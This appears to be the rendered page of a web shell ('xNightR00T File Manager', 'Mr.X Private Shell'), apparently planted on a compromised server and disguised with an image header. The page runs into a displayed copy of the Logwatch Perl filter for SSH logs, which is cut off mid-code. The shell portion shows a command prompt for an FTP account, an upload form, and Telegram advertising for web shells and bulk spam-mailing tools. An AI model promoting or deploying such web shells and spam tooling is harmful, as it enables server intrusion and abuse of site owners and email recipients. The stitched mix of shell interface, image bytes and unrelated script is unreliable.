xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
© xNightR00T
����JFIF��������� Mr.X 
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        

            For_More_Tools:
            
                Telegram: @jackleet | Bulk Smtp support mail sender  | Business Mail Collector  |  Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private

Upload:

Command:

ftpuser@216.73.216.168: ~ $ 
##########################################################################
# $Id$
##########################################################################
# $Log: sshd,v $
# Revision 1.79  2011/01/05 10:49:03  stefan
# ignoring PAM 2 more authentication failures
#
# Revision 1.78  2010/05/10 10:49:03  stefan
# ignoring nasty PTR records
#
# Revision 1.77  2009/02/20 17:49:03  mike
# pam_winbind ignores from JT Moree -mgt
#
# Revision 1.76  2009/02/20 17:39:15  mike
# Added pam_chroot from Alan Brenner -mgt
#
# Revision 1.75  2008/05/12 21:44:26  mike
# One more Solaris 10 filter -mgt
#
# Revision 1.74  2008/05/12 21:35:19  mike
# Solaris 10 cleanups pam_unix_auth and <invalid username> -mgt
#
# Revision 1.73  2008/05/03 16:15:22  mike
# Added debug1 line from Fedora patch tree -mgt
#
# Revision 1.72  2008/03/24 23:31:27  kirk
# added copyright/license notice to each script
#
# Revision 1.71  2007/11/25 20:20:05  bjorn
# Modified regexp of AllowUsers to allow for host names.
#
# Revision 1.70  2007/11/25 20:02:57  bjorn
# Handling chmod, chown errors, by Ivana Varekova.
#
# Revision 1.69  2007/09/20 00:00:15  bjorn
# Corrected handling of invalid logins, by Dan Wallis.
#
# Revision 1.68  2007/07/14 14:21:22  mike
# Added chan_read_failed ignore -mgt
#
# Revision 1.67  2007/06/18 03:53:25  bjorn
# Counting of some "not allowed" statements, by Jesus de Santos García.
#
# Revision 1.66  2007/04/15 20:59:02  bjorn
# Added support for refused_connections_threshold, by JT Moree.
#
#
# Revision 1.65  2007/01/29 20:09:17  bjorn
# Improved filtering, by Ivana Varekova.
#
# Revision 1.64  2006/11/12 20:59:31  bjorn
# Additional 'illegal user' processing, by Ivana Varekova.
#
# Revision 1.63  2006/09/15 15:40:58  bjorn
# Additional filtering by Ivana Varekova.
#
# Revision 1.62  2006/07/28 17:44:04  bjorn
# Filtering postponed with publickey, by Markus Lude.
#
# Revision 1.61  2006/03/20 20:42:57  bjorn
# Additional filtering, by Ivana Varekova.
#
# Revision 1.60  2006/03/08 04:29:34  bjorn
# Filter pam_krb5 message, by Markus Lude.
#
# Revision 1.59  2006/01/20 22:31:04  bjorn
# Handle new pam_unix format, by Ivana Varekova.
#
# Revision 1.58  2005/12/01 04:13:47  bjorn
# Removed extraneous 'these' sprinkled in output.
#
# Revision 1.57  2005/11/24 16:47:09  bjorn
# Count unknowns, by David Baldwin.
#
# Revision 1.56  2005/11/22 18:38:30  bjorn
# Filtering additional pam messages, by Ivana Varekova.
#
# Revision 1.55  2005/11/16 19:56:51  bjorn
# Filtering forced-command-only string.
#
# Revision 1.54  2005/10/19 05:48:39  bjorn
# Added name/IP mismatch detection, and filtering redundant entries, by
# Gilles Detillieux
#
# Revision 1.53  2005/10/01 18:59:48  bjorn
# Corrected patch from rev. 1.51
#
# Revision 1.52  2005/10/01 18:28:12  bjorn
# Modified to 'use strict', and added more filtering, by David Baldwin
#
# Revision 1.51  2005/09/29 15:06:55  bjorn
# Filtering failed bind on 0.0.0.0, by Ivana Varekova.
#
# Revision 1.50  2005/09/28 18:49:19  mike
# Ignore channel_lookup and server_input_channel_req from David Baldwin -mgt
#
# Revision 1.49  2005/09/28 18:28:52  mike
# Patch for no route read error -mgt
#
# Revision 1.48  2005/09/27 21:03:20  bjorn
# Allow filtering by host/network address
#
# Revision 1.47  2005/09/13 18:52:37  mike
# Patch from David Baldwin, ldap and key ignores, improved reset and timeout regex -mgt
#
# Revision 1.46  2005/08/31 23:19:38  bjorn
# LookupIP needs to be done after sorting by IP address, not before
#
# Revision 1.45  2005/07/21 05:56:59  bjorn
# Allow non-space chars for username
#
# Revision 1.44  2005/05/21 22:47:48  bjorn
# Provide summary per IP address, cleaned up "illegal" vs. "invalid"
# usage, removed duplicate code, all submitted by Gilles Detillieux
#
# Revision 1.43  2005/04/20 17:19:32  bjorn
# Remove pam_unix, for Debian
#
# Revision 1.42  2005/04/17 23:29:23  bjorn
# Reporting changes and pam filtering from Paweł Gołaszewski and Willi Mann
#
# Revision 1.41  2005/02/24 17:08:05  kirk
# Applying consolidated patches from Mike Tremaine
#
# Revision 1.9  2005/02/13 22:50:46  mgt
# patches from Pawel -mgt
#
# Revision 1.8  2005/02/13 21:26:13  mgt
# patches from Michael Weiser -mgt
#
# Revision 1.7  2005/02/13 21:03:40  mgt
# Patch from Jeffery ? -mgt
#
# Revision 1.6  2004/10/06 21:40:44  mgt
# Patches from Kenneth -mgt
#
# Revision 1.5  2004/07/29 19:33:29  mgt
# Chmod and removed perl call -mgt
#
# Revision 1.4  2004/07/27 00:23:07  mgt
# Suse 9.1 fix -mgt
#
# Revision 1.3  2004/07/10 01:54:36  mgt
# sync with kirk -mgt
#
# Revision 1.38  2004/06/23 15:01:17  kirk
# - Added more patches from blues@ds.pg.gda.pl
#
# Revision 1.37  2004/02/03 19:13:14  kirk
# More Solaris patches from Sean Boran <sean@boran.com>
#
# Revision 1.36  2004/02/03 18:39:34  kirk
# Patches from [ISO-8859-2] Pawe? Go?aszewski" <blues@ds.pg.gda.pl>
#
# Revision 1.35  2004/02/03 03:52:20  kirk
# Added mailscanner filter and more Solaris support from Mike Tremaine <mgt@stellarcore.net>
#
# Revision 1.34  2004/02/03 02:45:26  kirk
# Tons of patches, and new 'oidentd' and 'shaperd' filters from
# Pawe? Go?aszewski" <blues@ds.pg.gda.pl>
#
##########################################################################

#######################################################
## Copyright (c) 2008 Kirk Bauer
## Covered under the included MIT/X-Consortium License:
##    http://www.opensource.org/licenses/mit-license.php
## All modifications and contributions by other persons to
## this script are assumed to have been donated to the
## Logwatch project and thus assume the above copyright
## and licensing terms.  If you want to make contributions
## under your own copyright or a different license this
## must be explicitly stated in the contribution an the
## Logwatch project reserves the right to not accept such
## contributions.  If you have made significant
## contributions to this script and want to claim
## copyright please contact logwatch-devel@lists.sourceforge.net.
#########################################################

use strict;
use Logwatch ':all';

my $Debug = $ENV{'LOGWATCH_DEBUG'} || 0;
my $Detail = $ENV{'LOGWATCH_DETAIL_LEVEL'} || 0;
my $IgnoreHost = $ENV{'sshd_ignore_host'} || "";
my $RefusedConnectionsThreshold = $ENV{'refused_connections_threshold'} || 0;
my $DebugCounter = 0;

# No sense in running if 'sshd' doesn't even exist on this system...
#unless (( -f "/usr/sbin/sshd" ) or ( -f "/usr/local/sbin/sshd") or ( -f "/usr/lib/ssh/sshd")) {
#	exit (0);
#}

my %Users = ();
my %IllegalUsers = ();
my %PotentialIllegalUsers = ();
my %TooManyFailures = ();
my %NoIdent = ();
my %BindFailed = ();
my %BadLogins = ();
my %NoRevMap = ();
my %RefusedConnections = ();
my %RefusedAuthentication = ();
my %DisconnectReceived = ();
my %RootLogin = ();
my %PamReleaseFail = ();
my %PamError = ();
my %PamChroot = ();
my %ShadowInfo = ();
my %TTYModesFail = ();
my %LoginLock = ();
my %PostPonedAuth = ();
my %LockedAccount = ();
my %AllowUsers = ();
my %DenyUsers = ();
my %AllowGroups = ();
my %DenyGroups = ();
my %NoGroups = ();
my %NoShellUsers = ();
my %ShellNotExecutableUsers = ();
my %DeprecatedOption = ();
my %MisMatch = ();
my %KrbAutFail = ();
my %KrbAutErr = ();
my %KrbErr = ();
my @BadRSA = ();
my @Scanned = ();
my %OtherList = ();
my %ChmodErr = ();
my %ChownErr = ();
my %Krb_relm = ();

my $sftpRequests = 0;
my $NetworkErrors = 0;
my $Kills = 0;
my $Starts = 0;
my $NetworkErrors = 0;

if ( $Debug >= 5 ) {
   print STDERR "\n\nDEBUG: Inside SSHD Filter \n\n";
   $DebugCounter = 1;
}

while (defined(my $ThisLine = <STDIN>)) {
   if ( $Debug >= 5 ) {
      print STDERR "DEBUG($DebugCounter): $ThisLine";
      $DebugCounter++;
   }
   chomp($ThisLine);
   if (
       ($ThisLine =~ /^pam_succeed_if: requirement "uid < 100" (not|was) met by user /) or
       ($ThisLine =~ m/^(log: )?$/ ) or
       ($ThisLine =~ m/^(log: )?\^\[\[60G/ ) or
       ($ThisLine =~ m/^(log: )? succeeded$/ ) or
       ($ThisLine =~ m/^(log: )?Closing connection to/) or
       ($ThisLine =~ m/^(log: )?Starting sshd:/ ) or
       ($ThisLine =~ m/^(log: )?sshd \-TERM succeeded/ ) or
       ($ThisLine =~ m/^Bad protocol version identification .*:? [\d.]+/ ) or
       ($ThisLine =~ m/^Bad protocol version identification.*Big-Brother-Monitor/ ) or
       ($ThisLine =~ m/^Connection closed by/) or
       ($ThisLine =~ m/^Disconnecting: Command terminated on signal \d+/) or
       ($ThisLine =~ m/^Disconnecting: server_input_channel_req: unknown channel -?\d+/) or
       ($ThisLine =~ m/^connect from \d+\.\d+\.\d+\.\d+/) or
       ($ThisLine =~ m/^fatal: Timeout before authentication/ ) or
       ($ThisLine =~ m/^fatal: no hostkey alg/) or
       ($ThisLine =~ m/Connection from .* port /) or
       ($ThisLine =~ m/Postponed (keyboard-interactive|publickey) for [^ ]+ from [^ ]+/) or
       ($ThisLine =~ m/Read from socket failed/) or
       ($ThisLine =~ m/sshd startup\s+succeeded/) or
       ($ThisLine =~ m/sshd shutdown\s+succeeded/) or
       ($ThisLine =~ m/^Found matching [DR]SA key: /) or
       ($ThisLine =~ m/^error: key_read: type mismatch: encoding error/) or
       ($ThisLine =~ m/^channel_lookup: -?\d+: bad id/) or
       ($ThisLine =~ m/^error: channel \d+: chan_read_failed for istate/) or
       # Result of setting PermitRootLogin to forced-commands-only
       ($ThisLine =~ m/^Root login accepted for forced command.$/) or
       # usually followed by a session opened for user
       ($ThisLine =~ m/^pam_krb5\[\d+\]: authentication succeeds for /) or
       ($ThisLine =~ m/^nss_ldap: reconnect/) or
       ($ThisLine =~ m/^pam_ldap: error trying to bind as user "[^"]+" \(Invalid credentials\)/) or
       ($ThisLine =~ m/^pam_ldap: ldap_starttls_s: Can't contact LDAP server/) or
       ($ThisLine =~ m/^pam_sss\(sshd:.*\)/) or
       ($ThisLine =~ m/^\(pam_unix\) .*/) or
       ($ThisLine =~ m/^pam_unix\(.*:.*\)/) or
       ($ThisLine =~ m/^pam_unix_auth:/) or
       ($ThisLine =~ /pam_krb5: authentication succeeds for `([^ ]*)'/) or
       ($ThisLine =~ /pam_succeed_if\(.*:.*\): error retrieving information about user [a-zA-Z]*/ ) or
       ($ThisLine =~ /pam_winbind\(sshd:account\): user .* granted access/) or
       ($ThisLine =~ /pam_winbind\(sshd:account\): user .* OK/) or
       ($ThisLine =~ /pam_systemd\(sshd:session\): Moving/) or
       ($ThisLine =~ /PAM \d+ more authentication failures?;/) or
       ($ThisLine =~ /^PAM service\(sshd\) ignoring max retries;/) or
       ($ThisLine =~ /^Failed keyboard-interactive for <invalid username> from/ ) or
       ($ThisLine =~ /^Keyboard-interactive \(PAM\) userauth failed/ ) or
       ($ThisLine =~ /^debug1: /) or
       ($ThisLine =~ /Set \/proc\/self\/oom_(score_)?adj (from -?\d )?to -?\d/ ) or
       ($ThisLine =~ /Starting session: (forced-command|subsystem|shell|command)/ ) or
       ($ThisLine =~ /Found matching \w+ key:/ ) or
       ($ThisLine =~ /User child is on pid \d/ ) or
       ($ThisLine =~ /Nasty PTR record .* is set up for [\da-fA-F.:]+, ignoring/)
   ) {
      # Ignore these
   } elsif ( my ($Method,$User,$Host,$Port,$Key) = ($ThisLine =~ /^Accepted (\S+) for ((?:invalid user )?\S+) from ([\d\.:a-f]+) port (\d+) ssh[12](?:: (\w+))?/) ) {
      if ($Debug >= 5) {
         print STDERR "DEBUG: Found -$User logged in from $Host using $Method ($Key)\n";
      }
      if ($Detail >= 20) {
         $Users{$User}{$Host}{$Method . ($Key ? " ($Key)" : "")}++;
      } else {
         if ( $Host !~ /$IgnoreHost/ ) {
            $Users{$User}{$Host}{"(all)"}++;
         }
      }
   } elsif ( my ($Method, undef,$User,$Host,$Port) = ($ThisLine =~ m/^Failed (\S+) for (illegal|invalid) user (.*) from ([^ ]+) port (\d+)/ ) ) { #openssh
      $IllegalUsers{$Host}{$User}++;
   } elsif ( my ($User) = ( $ThisLine =~ /Disconnecting: Too many authentication failures for ([^ ]+)/)) {
      $TooManyFailures{$User}++;
   } elsif ( $ThisLine =~ m/^(fatal: )?Did not receive ident(ification)? string from (.+)/ ) { # ssh/openssh
      my $name = LookupIP($3);
      $NoIdent{$name}++;
   } elsif ( my ($Host) = ($ThisLine =~ /Could not write ident string to ([^ ]+)$/ )) {
      my $name = LookupIP($Host);
      $NoIdent{$name}++;
   } elsif (
      ($ThisLine =~ m/^fatal: Connection closed by remote host\./ ) or
      ($ThisLine =~ m/^(|fatal: )Read error from remote host(| [^ ]+): Connection reset by peer/ ) or
      ($ThisLine =~ m/^Read error from remote host [^ ]+: (Connection timed out|No route to host)/ ) or
      ($ThisLine =~ m/^fatal: Read from socket failed: No route to host/) or
      ($ThisLine =~ m/^fatal: Write failed: Network is unreachable/ ) or
      ($ThisLine =~ m/^fatal: Write failed: Broken pipe/) or
      ($ThisLine =~ m/^fatal: Write failed: Connection reset by peer/) or
      ($ThisLine =~ m/^channel \d+: open failed: (?:connect failed: Channel open failed\.|administratively prohibited: open failed)/) or
      ($ThisLine =~ m/^session_input_channel_req: no session \d+ req window-change/) or
      ($ThisLine =~ m/^error: chan_shutdown_read failed for .+/)
   ) {
      $NetworkErrors++;
   } elsif ( $ThisLine =~ m/^(log: )?Received (signal 15|SIG...); (terminating|restarting)\./) { #ssh/openssh
      $Kills++;
      if ( $Debug >= 5 ) {
         print STDERR "DEBUG: Found -Signal 15 Terminating- line\n";
      }
   } elsif ( $ThisLine =~ m/^(log: )?Server listening on( [^ ]+)? port \d+/ ) { #ssh/openssh
      $Starts++;
      if ( $Debug >= 5 ) {
         print STDERR "DEBUG: Found -Listening on port 22- line\n";
      }
   } elsif ( my ($Port,$Address,$Reason) = ($ThisLine =~ /^error: Bind to port ([^ ]+) on ([^ ]+) failed: (.+).$/ )) {
      my $Temp = "$Address port $Port ($Reason)";
      # Failed to bind on 0.0.0.0 likely due to configured "ListenAddress"
      # on both IPv4 and IPv6
      unless ($Address =~ /^0.0.0.0$/) {
         $BindFailed{$Temp}++;
      }
   } elsif ( $ThisLine =~ m/^(log: )?Generating .* \w+ key\./ ) { # ssh/openssh
      # Don't care about this...
      if ( $Debug >= 5 ) {
         print STDERR "DEBUG: Found -Generating RSA key- line\n";
      }
   } elsif ( $ThisLine =~ m/^packet_set_maxsize: /) {
      if ( $Debug >= 5 ) {
         print STDERR "DEBUG: Found -packet_set_maxsize- line\n";
      }
   } elsif ( $ThisLine =~ m/^(log: )?\w+ key generation complete\./ ) { # ssh/openssh
      # Don't care about this...
      if ( $Debug >= 5 ) {
         print STDERR "DEBUG: Found -Keygen complete- line\n";
      }
   } elsif ( my ($Method,$User,$Host,undef) = ( $ThisLine =~ m/^Failed (\S+) for (\S+) from ([^ ]+) port (\d+)/ ) ) { #openssh
      # depending on log mode, openssh may not report these in connection context.
      if ( $Debug >= 5 ) {
         print STDERR "DEBUG: Found -Failed login- line\n";
      }
      $BadLogins{$Host}{"$User/$Method"}++;
   } elsif ($ThisLine =~ s/^(log: )?Could not reverse map address ([^ ]*).*$/$2/) {
      $NoRevMap{$ThisLine}++;
   } elsif ( my ($Address) = ($ThisLine =~ /^reverse mapping checking getaddrinfo for (\S+( \[\S+\])?) failed - POSSIBLE BREAK-IN ATTEMPT!/)) {
      $NoRevMap{$Address}++;
   } elsif ( my ($IP,$Address) = ($ThisLine =~ /^Address ([^ ]*) maps to ([^ ]*), but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!/)) {
      $NoRevMap{"$Address($IP)"}++;
   } elsif ( my (undef,$Address) = ($ThisLine =~ /^warning: ([^ ]*), line \d+: can't verify hostname: getaddrinfo\(([^ ]*), AF_INET\) failed$/)) {
      $NoRevMap{$Address}++;
   } elsif ( (undef, my $Addresses) = ($ThisLine =~ /^warning: ([^ ]*), line \d+: host [^ ]* mismatch: (.*)$/)) {
      $MisMatch{$Addresses}++;
   } elsif ( $ThisLine =~ m/subsystem request for sftp/ ) {
      $sftpRequests++;
   } elsif ( $ThisLine =~ m/refused connect from (.*)$/ ) {
      $RefusedConnections{$1}++;
   } elsif ( my ($Reason) = ($ThisLine =~ /^Authentication refused: (.*)$/ ) ) {
      $RefusedAuthentication{$Reason}++;
   } elsif ( my ($Host,$Reason) = ($ThisLine =~ /^Received disconnect from ([^ ]*): (.*)$/)) {
      # Reason 11 (SSH_DISCONNECT_BY_APPLICATION) is expected, and logged at severity level INFO
      if ($Reason != 11) {$DisconnectReceived{$Reason}{$Host}++;}
   } elsif ( my ($Host) = ($ThisLine =~ /^ROOT LOGIN REFUSED FROM ([^ ]*)$/)) {
      $RootLogin{$Host}++;
   } elsif ( my ($Error) = ($ThisLine =~ /^Cannot release PAM authentication\[\d\]: (.*)$/)) {
      $PamReleaseFail{$Error}++;
   } elsif ( my ($Error) = ( $ThisLine =~ m/^error: PAM: (.*)$/)) {
      $PamError{$Error}++;
   } elsif ( my ($Reason) = ( $ThisLine =~ m/pam_chroot\(.+\):\s+([^:])/)) {
      $PamChroot{$Reason}++;
   } elsif ( my ($Error) = ( $ThisLine =~ m/^error: Could not get shadow information for (.*)$/)) {
      $ShadowInfo{$Error}++;
   } elsif ( my ($Reason) = ($ThisLine =~ /^Setting tty modes failed: (.*)$/)) {
      $TTYModesFail{$Reason}++;
   } elsif ( my ($User,undef) = ($ThisLine =~ /^User ([^ ]*) not allowed because ([^ ]*) exists$/)) {
      $LoginLock{$User}++;
   } elsif ( my ($Method,$InvaUser,$IlegUser,$EmptyUser,$User,$Host) = ($ThisLine =~ /^Postponed ([^ ]*) for ((invalid user) [^ ]*|(illegal user) [^ ]*|([^ ]*)) from ([^ ]*) port \d+ ssh/)) {
      $PostPonedAuth{"$User/$Method"}{$Host}++;
      if ($IlegUser =~ /illegal user/) {$IllegalUsers{$Host}{$User}++;}
   } elsif ( my ($User) = ($ThisLine =~ /^User ([^ ]*) not allowed because account is locked/)) {
      $LockedAccount{$User}++;
   } elsif ( my ($User) = ($ThisLine =~ /^User ([^ ]*) from (?:[^ ]*) not allowed because not listed in AllowUsers/)) {
      $AllowUsers{$User}++;
   } elsif ( my ($User) = ($ThisLine =~ /^User ([^ ]*)( from [0-9.]*)? not allowed because listed in DenyUsers/)){
      $DenyUsers{$User}++;
   } elsif ( my ($User) = ($ThisLine =~ /^User ([^ ]*)( from [0-9.]*)? not allowed because not in any group/)) {
      $NoGroups{$User}++;
   } elsif ( my ($User) = ($ThisLine =~ /^User ([^ ]*)( from [^ ]*)? not allowed because a group is listed in DenyGroups/)) {
      $DenyGroups{$User}++;
   } elsif ( my ($User) = ($ThisLine =~ /^User ([^ ]*) from ([^ ]*) not allowed because none of user's groups are listed in AllowGroups/)) {
      $AllowGroups{$User}++;
   } elsif ( ($User) = ($ThisLine =~ /^User ([^ ]*) not allowed because shell (\S+) does not exist/)) {
      $NoShellUsers{$User}++;
   } elsif ( ($User) = ($ThisLine =~ /^User ([^ ]*) not allowed because shell (\S+) is not executable/)) {
      $ShellNotExecutableUsers{$User}++;
   } elsif ( my ($IP) = ($ThisLine =~ /^scanned from ([^ ]*)/) ) {
      push @Scanned, $IP;
   } elsif ( my ($Line,$Option) = ($ThisLine =~ /^rexec line (\d+): Deprecated option (.*)$/)) {
      $DeprecatedOption{"$Option - line $Line"}++;
   } elsif ( my ($Pom1,$Pom2,$User) = ($ThisLine =~ /pam_krb5(\[\d*\])?: authentication fails for (`|')([^ ]*)'/)) {
      $KrbAutFail{$User}++;
   } elsif ( my ($Error) = ($ThisLine =~ /pam_krb5: authenticate error: (.*)$/)) {
      $KrbAutErr{$Error}++;
   } elsif ( ($ThisLine =~ /pam_krb5: unable to determine uid\/gid for user$/)) {
      $KrbAutErr{"unable to determine uid/gid for user"}++;
   } elsif ( my ($Error) = ($ThisLine =~ /pam_krb5: error removing file (.*)$/)) {
      $KrbErr{"error removing file " . $Error}++;
   } elsif ( my ($Pom,$Error) = ($ThisLine =~ /pam_krb5(\[\d*\]): error resolving user name '[^ ]*' to uid\/gid pai/)) {
      $KrbErr{"error resolving user name '$Error' to uid\/gid pai"}++;
   } elsif ( my (undef,$User,$Host) = ($ThisLine =~ m/^(Illegal|Invalid) user (.*) from ([^ ]+)/ )) {
      $PotentialIllegalUsers{$Host}{$User}++;
   } elsif ( my (undef,$User) = ($ThisLine =~ /^input_userauth_request: (illegal|invalid) user (.*)$/ )) {
      $PotentialIllegalUsers{"undef"}{$User}++;
   } elsif (my ($File,$Perm,$Why) = ($ThisLine =~ /error: chmod (.*) (.*) failed: (.*)/)) {
      $ChmodErr{"$File,$Perm,$Why"}++;
   } elsif (my ($File,$From,$To,$Why) = ($ThisLine =~ /error: chown (.*) (.*) (.*) failed: (.*)/)) {
      $ChownErr{"$File,$From,$To,$Why"}++;
   } elsif (my ($user,$relm) = ($ThisLine =~ /Authorized to ([^ ]+), krb5 principal \1@([^ ]+) \(krb5_kuserok\)/)) {
      $Krb_relm{$relm}{$user}++;  
   } else {
      # Report any unmatched entries...
      unless ($ThisLine =~ /fwd X11 connect/) {
         $OtherList{$ThisLine} += 1;
      }
   }
}

###########################################################

foreach my $Host (keys %PotentialIllegalUsers) {
   foreach my $User (keys %{$PotentialIllegalUsers{$Host}}) {
      my @user_hosts = grep { $PotentialIllegalUsers{$_}{$User} } keys %PotentialIllegalUsers;

      if ($Host eq "undef") {
         if ((scalar @user_hosts) == 1 && $user_hosts[0] == "undef") {
            # Report illegal user from "undef" only if there are no other hosts
            # for the given user
            $IllegalUsers{"undef"}{$User}++;
         }
      }
      else {
         while ($IllegalUsers{$Host}{$User} < $PotentialIllegalUsers{$Host}{$User}) {
            $IllegalUsers{$Host}{$User}++;
         }
      }
   }
}

###########################################################

if ($NetworkErrors) {
   print "\nNetwork Read Write Errors: " . $NetworkErrors . "\n";
}
if ($Kills) {
   print "\nSSHD Killed: " . $Kills . " Time(s)\n";
}
if ($Starts) {
   print "\nSSHD Started: " . $Starts . " Time(s)\n";
}

if (keys %DeprecatedOption) {
   print "\nDeprecated options in SSH config:\n";
   foreach my $Option (sort {$a cmp $b} keys %DeprecatedOption) {
      print "   $Option\n";
   }
}

if (keys %RootLogin) {
   print "\n\nWARNING!!!\n";
   print "Refused ROOT login attempt from:\n";
   foreach my $Host (sort {$a cmp $b} keys %RootLogin) {
      print "   $Host : $RootLogin{$Host} Time(s)\n";
   }
}

if (keys %BindFailed) {
   print "\nFailed to bind:\n";
   foreach my $ThisOne (sort {$a cmp $b} keys %BindFailed) {
	   print "   $ThisOne : $BindFailed{$ThisOne} Time(s)\n";
   }
}

if ($Detail >= 10) {
   if (keys %NoRevMap) {
      print "\nCouldn't resolve these IPs:\n";
      foreach my $ThisOne (sort {$a cmp $b} keys %NoRevMap) {
         print "   $ThisOne: $NoRevMap{$ThisOne} Time(s)\n";
      }
   }
   if (keys %NoIdent) {
      print "\nDidn't receive an ident from these IPs:\n";
      foreach my $ThisOne (sort {$a cmp $b} keys %NoIdent) {
         print "   $ThisOne: $NoIdent{$ThisOne} Time(s)\n";
      }
   }
   if (keys %MisMatch) {
      print "\nMismatched host names and/or IPs:\n";
      foreach my $ThisOne (sort keys %MisMatch) {
         print "   $ThisOne: $MisMatch{$ThisOne} Time(s)\n";
      }
   }
}

if ($#BadRSA >= 0) {
   print "\nReceived a bad response to RSA challenge from:\n";
   foreach my $ThisOne (@BadRSA) {
      print "   $ThisOne\n";
   }
}

if (keys %TooManyFailures) {
   print "\nDisconnecting after too many authentication failures for user:\n";
   foreach my $User (sort {$a cmp $b} keys %TooManyFailures) {
      print "   $User : $TooManyFailures{$User} Time(s)\n";
   }
}

if (keys %BadLogins) {
   print "\nFailed logins from:\n";
   foreach my $ip (sort SortIP keys %BadLogins) {
      my $name = LookupIP($ip);
      my $totcount = 0;
      foreach my $user (keys %{$BadLogins{$ip}}) {
         $totcount += $BadLogins{$ip}{$user};
      }
      my $plural = ($totcount > 1) ? "s" : "";
      print "   $name: $totcount time$plural\n";
      if ($Detail >= 5) {
         my $sort = CountOrder(%{$BadLogins{$ip}});
         foreach my $user (sort $sort keys %{$BadLogins{$ip}}) {
            my $val = $BadLogins{$ip}{$user};
            my $plural = ($val > 1) ? "s" : "";
            print "      $user: $val time$plural\n";
         }
      }
   }
}

if (keys %IllegalUsers) {
   print "\nIllegal users from:\n";
   foreach my $ip (sort SortIP keys %IllegalUsers) {
      my $name = LookupIP($ip);
      my $totcount = 0;
      foreach my $user (keys %{$IllegalUsers{$ip}}) {
         $totcount += $IllegalUsers{$ip}{$user};
      }
      my $plural = ($totcount > 1) ? "s" : "";
      print "   $name: $totcount time$plural\n";
      if ($Detail >= 5) {
         my $sort = CountOrder(%{$IllegalUsers{$ip}});
         foreach my $user (sort $sort keys %{$IllegalUsers{$ip}}) {
            my $val = $IllegalUsers{$ip}{$user};
            my $plural = ($val > 1) ? "s" : "";
            print "      $user: $val time$plural\n";
         }
      }
   }
}

if (keys %LockedAccount) {
   print "\nLocked account login attempts:\n";
   foreach my $User (sort {$a cmp $b} keys %LockedAccount) {
      print "   $User : $LockedAccount{$User} Time(s)\n";
   }
}

if (keys %AllowUsers) {
   print "\nLogin attempted when not in AllowUsers list:\n";
   foreach my $User (sort {$a cmp $b} keys %AllowUsers) {
      print "   $User : $AllowUsers{$User} Time(s)\n";
   }
}

if (keys %DenyUsers) {
   print "\nLogin attempted when in DenyUsers list:\n";
   foreach my $User (sort {$a cmp $b} keys %DenyUsers) {
      print "   $User : $DenyUsers{$User} Time(s)\n";
   }
}

if (keys %AllowGroups) {
   print "\nLogin attempted when not in AllowGroups list:\n";
   foreach my $User (sort {$a cmp $b} keys %AllowGroups) {
      print "   $User : $AllowGroups{$User} Time(s)\n";
   }
}

if (keys %DenyGroups) {
   print "\nLogin attempted when in DenyGroups list:\n";
   foreach my $User (sort {$a cmp $b} keys %DenyGroups) {
      print "   $User : $DenyGroups{$User} Time(s)\n";
   }
}

if (keys %NoGroups) {
   print "\nLogin attempted when user is in no group:\n";
   foreach my $User (sort {$a cmp $b} keys %NoGroups) {
      print "   $User : $NoGroups{$User} Time(s)\n";
   }
}

if (keys %NoShellUsers) {
   print "\nLogin attempted when shell does not exist:\n";
   foreach my $User (sort {$a cmp $b} keys %NoShellUsers) {
      print "   $User : $NoShellUsers{$User} Time(s)\n";
   }
}

if (keys %ShellNotExecutableUsers) {
   print "\nLogin attempted when shell is not executable:\n";
   foreach my $User (sort {$a cmp $b} keys %ShellNotExecutableUsers) {
      print "   $User : $ShellNotExecutableUsers{$User} Time(s)\n";
   }
}

if ((keys %LoginLock) and ($Detail >= 5)) {
   print "\nUser login attempt when nologin was set:\n";
   foreach my $User (sort {$a cmp $b} keys %LoginLock) {
      print "   $User : $LoginLock{$User} Time(s)\n";
   }
}

if (keys %PostPonedAuth) {
   print "\nPostponed authentication:\n";
   foreach my $User (sort {$a cmp $b} keys %PostPonedAuth) {
      print "   $User:\n";
      foreach my $Host (sort {$a cmp $b} keys %{$PostPonedAuth{$User}}) {
         print "      $Host: $PostPonedAuth{$User}{$Host} Time(s)\n";
      }
   }
}

if (keys %Users) {
   print "\nUsers logging in through sshd:\n";
   foreach my $user (sort {$a cmp $b} keys %Users) {
      print "   $user:\n";
      my $totalSort = TotalCountOrder(%{$Users{$user}}, \&SortIP);
      foreach my $ip (sort $totalSort keys %{$Users{$user}}) {
         my $name = LookupIP($ip);
         if ($Detail >= 20) {
            print "      $name:\n";
            my $sort = CountOrder(%{$Users{$user}{$ip}});
            foreach my $method (sort $sort keys %{$Users{$user}{$ip}}) {
               my $val = $Users{$user}{$ip}{$method};
               my $plural = ($val > 1) ? "s" : "";
               print "         $method: $val time$plural\n";
            }
         } else {
            my $val = (values %{$Users{$user}{$ip}})[0];
            my $plural = ($val > 1) ? "s" : "";
            print "      $name: $val time$plural\n";
         }
      }
   }
}

if (keys %RefusedAuthentication) {
   print "\n\nAuthentication refused:\n";
   foreach my $Reason (sort {$a cmp $b} keys %RefusedAuthentication) {
      print "   $Reason : $RefusedAuthentication{$Reason} Time(s)\n";
   }
}

if (keys %KrbAutFail) {
   print "\n\Failed pam_krb5 authentication:\n";
   foreach my $User (sort keys %KrbAutFail) {
      print "   $User: " .  $KrbAutFail{$User} . " Time(s)\n";
   }
}

if (keys %KrbAutErr) {
   print "\n\pam_krb5 authentication errors:\n";
   foreach my $Error (sort keys %KrbAutErr) {
      print "   $Error: " .  $KrbAutErr{$Error} . " Time(s)\n";
   }
}


if (keys %KrbErr) {
   print "\n pam_krb5 errors:\n";
   foreach my $Error (sort keys %KrbErr) {
      print "   $Error: " . $KrbErr{$Error} . " Time(s)\n";
   }
}


if (keys %DisconnectReceived) {
   print "\n\nReceived disconnect:\n";
   foreach my $Reason (sort {$a cmp $b} keys %DisconnectReceived) {
      my $Total = 0;
